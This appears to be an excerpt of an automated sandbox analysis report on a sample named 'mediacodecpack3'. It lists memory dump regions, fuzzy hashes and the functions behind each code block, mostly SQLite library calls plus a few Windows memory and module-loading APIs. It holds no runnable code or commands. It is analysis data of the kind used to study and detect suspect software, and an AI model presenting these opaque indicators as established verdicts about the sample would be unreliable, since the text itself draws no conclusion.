                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 1894464702-0
                                                                                            • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                            • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                            APIs
                                                                                              • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                            • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                            • sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 3336957480-0
                                                                                            • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                            • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                            APIs
                                                                                            • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                            • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                            • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                            • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                            • String ID:
                                                                                            • API String ID: 3091402450-0
                                                                                            • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                            • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                            • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                            • String ID:
                                                                                            • API String ID: 4225432645-0
                                                                                            • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                            • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                            • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                            • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                            • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                            • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ($string or blob too big$|
                                                                                            • API String ID: 632333372-2398534278
                                                                                            • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                            • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Protect$Query
                                                                                            • String ID: @
                                                                                            • API String ID: 3618607426-2766056989
                                                                                            • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                            • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                            • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                            • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                            • String ID: d
                                                                                            • API String ID: 211589378-2564639436
                                                                                            • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                            • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                            • API String ID: 1646373207-2713375476
                                                                                            • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                            • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                            • API String ID: 1646373207-3105848591
                                                                                            • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                            • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                            • Opcode Fuzzy Hash: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                            • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 714016831-0
                                                                                            • Opcode ID: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                            • Instruction ID: c10c021e120759eda6135e36457b27e0c23e5a43da849e4fe0a9db16ba58ca85
                                                                                            • Opcode Fuzzy Hash: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                            • Instruction Fuzzy Hash: 453142B65007029BD3309F24DD40B26B7E0EB88B54F10CA3AEA95B76D1E778A8448F4C
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 2313487548-0
                                                                                            • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                            • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                            • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                            • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                            • API String ID: 0-1177837799
                                                                                            • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                            • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                            • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                            • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1648232842-0
                                                                                            • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                            • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                            APIs
                                                                                            • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                            • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 3429445273-0
                                                                                            • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                            • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1035992805-0
